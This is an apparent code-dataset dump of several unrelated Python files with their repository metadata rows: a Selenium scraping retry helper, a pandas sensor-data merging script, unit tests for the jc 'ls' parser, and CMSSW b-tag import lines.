driver.get(url)
time.sleep(1)
info = driver.find_element_by_class_name(info_class_name).text
success = True
logger.debug(f'{url} 抓取成功!')
except:
attempts += 1
if attempts == 3:
info = '抓取重试次数达到3次,内容页抓取失败!'
logger.error(f'{url} {info}')
break
return info
def get_id(driver, url, info_id_name):
attempts = 0
success = False
while attempts < 3 and not success:
try:
driver.get(url)
time.sleep(1)
info = driver.find_element_by_id(info_id_name).text
success = True
logger.debug(f'{url} 抓取成功!')
except:
attempts += 1
if attempts == 3:
info = '抓取重试次数达到3次,内容页抓取失败!'
logger.error(f'{url} {info}')
break
return info | 26.636364 | 74 | 0.525597 | 134 | 1,172 | 4.440299 | 0.365672 | 0.047059 | 0.043697 | 0.067227 | 0.736134 | 0.736134 | 0.736134 | 0.736134 | 0.736134 | 0.736134 | 0 | 0.018996 | 0.37116 | 1,172 | 44 | 75 | 26.636364 | 0.788331 | 0.053754 | 0 | 0.810811 | 0 | 0 | 0.098127 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.027027 | 0 | 0.135135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
130d4a57dc6dbb9f34a5fe7ba49abeaa9b909bc3 | 2,107 | py | Python | DataProcess/WithdrawSpecificCol.py | ztlevi/TRI_Visualization | c9abfc9c41da1dcef71e3a6673bebeb299317014 | [
"FSFAP"
] | 5 | 2017-07-12T18:10:38.000Z | 2017-12-29T02:40:24.000Z | DataProcess/WithdrawSpecificCol.py | ztlevi/TRI_demo | c9abfc9c41da1dcef71e3a6673bebeb299317014 | [
"FSFAP"
] | null | null | null | DataProcess/WithdrawSpecificCol.py | ztlevi/TRI_demo | c9abfc9c41da1dcef71e3a6673bebeb299317014 | [
"FSFAP"
] | null | null | null | import pandas as pd
df1 = pd.read_csv('synced_118_07182017_DataLogger_01.csv',error_bad_lines=False, index_col=False, dtype='unicode')
pd.DataFrame(df1, columns= ['time [s]', 'long accel [g]', 'lat accel [g]', 'vector accel [g]', 'vert accel [g]', 'speed [mph]', 'GPS long [degs]', 'GPS lat [degs]'])
print pd.DataFrame(df1, columns= ['time [s]', 'long accel [g]', 'lat accel [g]','vector accel [g]', 'vert accel [g]', 'speed [mph]', 'GPS long [degs]', 'GPS lat [degs]'])
df1_to_save = pd.DataFrame(df1,columns= ['time [s]', 'long accel [g]', 'lat accel [g]','vector accel [g]', 'vert accel [g]', 'speed [mph]', 'GPS long [degs]', 'GPS lat [degs]'])
df1_to_save.to_csv('output01.csv',index=False)
df2 = pd.read_csv('synced_2017_07_18-14_10_38_Summary.csv',error_bad_lines=False, index_col=False, dtype='unicode')
pd.DataFrame(df2, columns= ['Time', 'HR', 'BR','Posture', 'Activity', 'PeakAccel', 'HRV'])
print pd.DataFrame(df2, columns= ['Time', 'HR', 'BR','Posture', 'Activity', 'PeakAccel', 'HRV'])
df2_to_save = pd.DataFrame(df2,columns= ['Time', 'HR', 'BR','Posture', 'Activity', 'PeakAccel', 'HRV'])
df2_to_save.to_csv('output02.csv',index=False)
df3 = pd.read_csv('Synchronized_data_Yuanma_Trip6.csv',error_bad_lines=False, index_col=False, dtype='unicode')
pd.DataFrame(df3, columns= ['ecg', 'gsr', 'scl','scr', 'driver_workload', 'expert_workload', 'traffic_load','event','GPS heading [degs]'])
print pd.DataFrame(df3, columns= ['ecg', 'gsr', 'scl','scr', 'driver_workload', 'expert_workload', 'traffic_load','event','GPS heading [degs]'])
df3_to_save = pd.DataFrame(df3, columns= ['ecg', 'gsr', 'scl','scr', 'driver_workload', 'expert_workload', 'traffic_load','event','GPS heading [degs]'])
df3_to_save.to_csv('output03.csv',index=False)
df4 = pd.merge(df1,df2, how = 'outer', on='GPS lat [degs]')
df4_to_save = pd.DataFrame(df4, columns= ['time [s]', 'long accel [g]', 'lat accel [g]','vector accel [g]', 'vert accel [g]', 'speed [mph]', 'GPS long [degs]', 'GPS lat [degs]', 'Time', 'HR', 'BR','Posture', 'Activity', 'PeakAccel', 'HRV'])
df4_to_save.to_csv('trip6.csv',index=False)
| 61.970588 | 240 | 0.669673 | 323 | 2,107 | 4.201238 | 0.232198 | 0.070744 | 0.036846 | 0.047163 | 0.764923 | 0.764923 | 0.764923 | 0.73913 | 0.73913 | 0.73913 | 0 | 0.031069 | 0.098719 | 2,107 | 33 | 241 | 63.848485 | 0.683518 | 0 | 0 | 0 | 0 | 0 | 0.467489 | 0.051732 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0.157895 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13372bd5f270393ffe5c3f0876558885912c5d9a | 21,751 | py | Python | tests/test_ls.py | listuser/jc | 3ac8d0362b4fb9999fc55a60a9cb20ac80d114f7 | [
"MIT"
] | 3,215 | 2019-10-24T15:25:56.000Z | 2022-03-31T15:43:01.000Z | tests/test_ls.py | listuser/jc | 3ac8d0362b4fb9999fc55a60a9cb20ac80d114f7 | [
"MIT"
] | 109 | 2019-11-02T16:22:29.000Z | 2022-03-30T17:32:17.000Z | tests/test_ls.py | listuser/jc | 3ac8d0362b4fb9999fc55a60a9cb20ac80d114f7 | [
"MIT"
] | 75 | 2020-02-07T00:16:32.000Z | 2022-03-29T09:29:53.000Z | import os
import sys
import time
import json
import unittest
import jc.parsers.ls
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
# Set the timezone on POSIX systems. Need to manually set for Windows tests
if not sys.platform.startswith('win32'):
os.environ['TZ'] = 'America/Los_Angeles'
time.tzset()
class MyTests(unittest.TestCase):
def setUp(self):
# input
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls.out'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-al.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_al = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-al.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_al = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls-al.out'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_al = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-al.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_al = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-alh.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_alh = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-alh.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_alh = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls-alh.out'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_alh = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-alh.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_alh = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-R.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_R = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-R.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_R = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-R.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_R = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-alR.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_alR = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-alR.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_alR = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-alR.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_alR = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-glob.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_glob = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-glob.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_glob = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-glob.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_glob = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-R-newlines.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_R_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-R-newlines.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_R_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-R-newlines.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_R_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-l-newlines.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_l_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-l-newlines.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_l_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-l-newlines.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_l_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-lR-newlines.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_lR_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-lR-newlines.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_lR_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-lR-newlines.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_lR_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-newlines.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-newlines.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-newlines.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-lR-empty-folder.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_lR_empty_folder = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-l-iso.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_l_iso = f.read()
# output
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls.json'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-al.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_al_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-al.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_al_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls-al.json'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_al_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-al.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_al_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-alh.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_alh_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-alh.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_alh_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls-alh.json'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_alh_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-alh.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_alh_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-R.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_R_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-R.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_R_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-R.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_R_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-alR.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_alR_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-alR.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_alR_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-alR.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_alR_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-glob.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_glob_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-glob.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_glob_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-glob.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_glob_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-R-newlines.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_R_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-R-newlines.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_R_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-R-newlines.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_R_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-l-newlines.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_l_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-l-newlines.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_l_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-l-newlines.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_l_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-lR-newlines.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_lR_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-lR-newlines.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_lR_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-lR-newlines.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_lR_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-newlines.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-newlines.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-newlines.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-lR-empty-folder.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_lR_empty_folder_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-l-iso.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_l_iso_json = json.loads(f.read())
def test_ls_empty_dir(self):
"""
Test plain 'ls' on an empty directory
"""
self.assertEqual(jc.parsers.ls.parse('', quiet=True), [])
def test_ls_centos_7_7(self):
"""
Test plain 'ls /' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls, quiet=True), self.centos_7_7_ls_json)
def test_ls_ubuntu_18_4(self):
"""
Test plain 'ls /' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls, quiet=True), self.ubuntu_18_4_ls_json)
def test_ls_osx_10_11_6(self):
"""
Test plain 'ls /' on OSX 10.11.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_11_6_ls, quiet=True), self.osx_10_11_6_ls_json)
def test_ls_osx_10_14_6(self):
"""
Test plain 'ls /' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls, quiet=True), self.osx_10_14_6_ls_json)
def test_ls_al_centos_7_7(self):
"""
Test 'ls -al /' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_al, quiet=True), self.centos_7_7_ls_al_json)
def test_ls_al_ubuntu_18_4(self):
"""
Test 'ls -al /' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_al, quiet=True), self.ubuntu_18_4_ls_al_json)
def test_ls_al_osx_10_11_6(self):
"""
Test 'ls -al /' on OSX 10.11.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_11_6_ls_al, quiet=True), self.osx_10_11_6_ls_al_json)
def test_ls_al_osx_10_14_6(self):
"""
Test 'ls -al /' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_al, quiet=True), self.osx_10_14_6_ls_al_json)
def test_ls_alh_centos_7_7(self):
"""
Test 'ls -alh /' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_alh, quiet=True), self.centos_7_7_ls_alh_json)
def test_ls_alh_ubuntu_18_4(self):
"""
Test 'ls -alh /' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_alh, quiet=True), self.ubuntu_18_4_ls_alh_json)
def test_ls_alh_osx_10_11_6(self):
"""
Test 'ls -alh /' on OSX 10.11.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_11_6_ls_alh, quiet=True), self.osx_10_11_6_ls_alh_json)
def test_ls_alh_osx_10_14_6(self):
"""
Test 'ls -alh /' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_alh, quiet=True), self.osx_10_14_6_ls_alh_json)
def test_ls_R_centos_7_7(self):
"""
Test 'ls -R /usr' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_R, quiet=True), self.centos_7_7_ls_R_json)
def test_ls_R_ubuntu_18_4(self):
"""
Test 'ls -R /usr' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_R, quiet=True), self.ubuntu_18_4_ls_R_json)
def test_ls_R_osx_10_14_6(self):
"""
Test 'ls -R /usr' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_R, quiet=True), self.osx_10_14_6_ls_R_json)
def test_ls_alR_centos_7_7(self):
"""
Test 'ls -alR /usr' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_alR, quiet=True), self.centos_7_7_ls_alR_json)
def test_ls_alR_ubuntu_18_4(self):
"""
Test 'ls -alR /usr' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_alR, quiet=True), self.ubuntu_18_4_ls_alR_json)
def test_ls_alR_osx_10_14_6(self):
"""
Test 'ls -alR /usr' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_alR, quiet=True), self.osx_10_14_6_ls_alR_json)
def test_ls_glob_centos_7_7(self):
"""
Test 'ls /usr/*' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_glob, quiet=True), self.centos_7_7_ls_glob_json)
def test_ls_glob_ubuntu_18_4(self):
"""
Test 'ls /usr/*' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_glob, quiet=True), self.ubuntu_18_4_ls_glob_json)
def test_ls_glob_osx_10_14_6(self):
"""
Test 'ls /usr/*' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_glob, quiet=True), self.osx_10_14_6_ls_glob_json)
def test_ls_R_newlines_centos_7_7(self):
"""
Test 'ls -R' for filenames with newline characters on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_R_newlines, quiet=True), self.centos_7_7_ls_R_newlines_json)
def test_ls_R_newlines_ubuntu_18_4(self):
"""
Test 'ls -R' for filenames with newline characters on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_R_newlines, quiet=True), self.ubuntu_18_4_ls_R_newlines_json)
def test_ls_R_newlines_osx_10_14_6(self):
"""
Test 'ls -R' for filenames with newline characters on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_R_newlines, quiet=True), self.osx_10_14_6_ls_R_newlines_json)
def test_ls_l_newlines_centos_7_7(self):
"""
Test 'ls -l' for filenames with newline characters on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_l_newlines, quiet=True), self.centos_7_7_ls_l_newlines_json)
def test_ls_l_newlines_ubuntu_18_4(self):
"""
Test 'ls -l' for filenames with newline characters on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_l_newlines, quiet=True), self.ubuntu_18_4_ls_l_newlines_json)
def test_ls_l_newlines_osx_10_14_6(self):
"""
Test 'ls -l' for filenames with newline characters on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_l_newlines, quiet=True), self.osx_10_14_6_ls_l_newlines_json)
def test_ls_lR_newlines_centos_7_7(self):
"""
Test 'ls -lR' for filenames with newline characters on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_lR_newlines, quiet=True), self.centos_7_7_ls_lR_newlines_json)
def test_ls_lR_newlines_ubuntu_18_4(self):
"""
Test 'ls -lR' for filenames with newline characters on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_lR_newlines, quiet=True), self.ubuntu_18_4_ls_lR_newlines_json)
def test_ls_lR_newlines_osx_10_14_6(self):
"""
Test 'ls -lR' for filenames with newline characters on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_lR_newlines, quiet=True), self.osx_10_14_6_ls_lR_newlines_json)
def test_ls_newlines_centos_7_7(self):
"""
Test 'ls' for filenames with newline characters on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_newlines, quiet=True), self.centos_7_7_ls_newlines_json)
def test_ls_newlines_ubuntu_18_4(self):
"""
Test 'ls' for filenames with newline characters on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_newlines, quiet=True), self.ubuntu_18_4_ls_newlines_json)
def test_ls_newlines_osx_10_14_6(self):
"""
Test 'ls' for filenames with newline characters on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_newlines, quiet=True), self.osx_10_14_6_ls_newlines_json)
def test_ls_lR_empty_folder_osx_10_14_6(self):
"""
Test 'ls -lR' for empty directories on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_lR_empty_folder, quiet=True), self.osx_10_14_6_ls_lR_empty_folder_json)
def test_ls_l_iso_ubuntu_18_4(self):
"""
Test 'ls -l --time-style=full-iso' for files with convertible dates on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_l_iso, quiet=True), self.ubuntu_18_4_ls_l_iso_json)
if __name__ == '__main__':
unittest.main()
| 48.335556 | 136 | 0.649579 | 3,863 | 21,751 | 3.398136 | 0.026145 | 0.04266 | 0.046926 | 0.05363 | 0.966786 | 0.957645 | 0.937229 | 0.881542 | 0.828445 | 0.784947 | 0 | 0.061463 | 0.193646 | 21,751 | 449 | 137 | 48.443207 | 0.686983 | 0.079031 | 0 | 0 | 0 | 0.00885 | 0.16796 | 0.144315 | 0 | 0 | 0 | 0 | 0.159292 | 1 | 0.163717 | false | 0 | 0.026549 | 0 | 0.19469 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1340d9623f5ee095ef51ab43af16223aaac47aa6 | 352 | py | Python | RecoBTag/PerformanceDB/python/PoolBTagPerformanceDBWinter13.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoBTag/PerformanceDB/python/PoolBTagPerformanceDBWinter13.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoBTag/PerformanceDB/python/PoolBTagPerformanceDBWinter13.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | from RecoBTag.PerformanceDB.measure.Pool_btagMistagWinter13 import *
from RecoBTag.PerformanceDB.measure.Pool_btagMuJetsWpNoTtbar import *
from RecoBTag.PerformanceDB.measure.Pool_btagMuJetsWpTtbar import *
from RecoBTag.PerformanceDB.measure.Pool_btagTtbarWpWinter13 import *
from RecoBTag.PerformanceDB.measure.Pool_btagTtbarDiscrimWinter13 import *
